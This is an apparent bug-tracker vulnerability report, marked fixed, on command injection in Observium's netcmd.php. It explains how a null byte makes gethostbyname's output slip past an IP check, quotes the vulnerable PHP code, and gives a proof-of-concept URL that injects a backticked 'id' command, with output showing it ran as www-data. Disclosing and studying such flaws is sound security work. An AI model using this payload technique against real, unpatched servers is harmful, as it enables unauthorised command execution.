Details
-
Bug
-
Resolution: Fixed
-
Major
-
None
-
Community Edition
Description
It is possible to inject arbitrary OS-level shell commands through an vulnerability in the netcmd.php file.
The code tries to resolve the IP-address to use in a query. If an attacker supplies a non-valid IP-address then a hostname lookup is performed using gethostbyname. If gethostbyname fails to return a valid IP-address, then this function will return the unmodified hostname. If this occurs, netcmd.php will not execute the command requested. This is a security measure. However, it's possible to make gethostbyname fail the lookup and return a modified string, thus bypassing the security check. If the input data contains a null byte it will only return the characters before the null byte.
|
netcmd.php |
$host = $_GET['query'];
|
$ip = '';
|
if (Net_IPv4::validateIP($host))
|
{
|
$ip = $host;
|
$ip_version = 4;
|
}
|
elseif (Net_IPv6::checkIPv6($host))
|
{
|
$ip = $host;
|
$ip_version = 6;
|
}
|
else
|
{
|
$ip = gethostbyname($host);
|
if ($ip && $ip != $host)
|
{
|
$ip_version = 4;
|
} else {
|
$ip = gethostbyname6($host, FALSE);
|
if ($ip)
|
{
|
$ip_version = 6;
|
}
|
}
|
}
|
The following request can be used as a proof of concept:
http://observium/netcmd.php?cmd=whois&query=%22%60id%60%22%00
The URL decoded query string: "`id`"%00
#
|
# ARIN WHOIS data and services are subject to the Terms of Use
|
# available at: https://www.arin.net/whois_tou.html
|
#
|
# If you see inaccuracies in the results, please report at
|
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
|
#
|
|
|
|
|
#
|
# Query terms are invalid. Please specify a record type.
|
#
|
#
|
|
|
No match found for uid=33(www-data) gid=33(www-data) groups=33(www-data).
|
|
|
|
|
|
|
|
|
#
|
# ARIN WHOIS data and services are subject to the Terms of Use
|
# available at: https://www.arin.net/whois_tou.html
|
#
|
# If you see inaccuracies in the results, please report at
|
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
|
#
|